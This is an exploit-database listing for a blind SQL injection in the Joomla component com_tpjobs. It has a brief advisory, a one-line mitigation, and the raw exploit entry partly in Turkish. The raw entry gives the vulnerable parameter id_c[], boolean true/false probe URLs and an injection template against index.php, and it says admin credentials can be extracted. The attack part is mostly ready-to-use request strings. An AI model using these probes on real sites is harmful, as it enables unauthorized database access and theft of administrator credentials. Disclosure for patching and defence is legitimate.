header-logo
Suggest Exploit
vendor:
com_tpjobs
by:
FL0RiX
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: com_tpjobs
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_tpjobs Blind SQL injection Vulnerability

com_tpjobs is vulnerable to Blind SQL injection. An attacker can exploit this vulnerability to gain access to admin login credentials. The vulnerable parameter is ‘id_c[]’. The attacker can inject malicious SQL queries in the parameter and gain access to the admin credentials. The malicious query should be filtered to prevent exploitation.

Mitigation:

Filter malicious characters from the vulnerable parameter.
Source

Exploit-DB raw data:

<------------------- header data start ------------------- >

#####################################################################
#Joomla Component com_tpjobs Blind SQL injection Vulnerability
#####################################################################

# author        : FL0RiX

# Name           : com_tpjobs

# Bug Type       : (Blind) SQL Injection

# Infection      : Admin login bilgileri al&#305;nabilir.

# Demo Vuln.     :
TRUE(+)
» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1
FALSE(-)
» http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

# Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end of -- >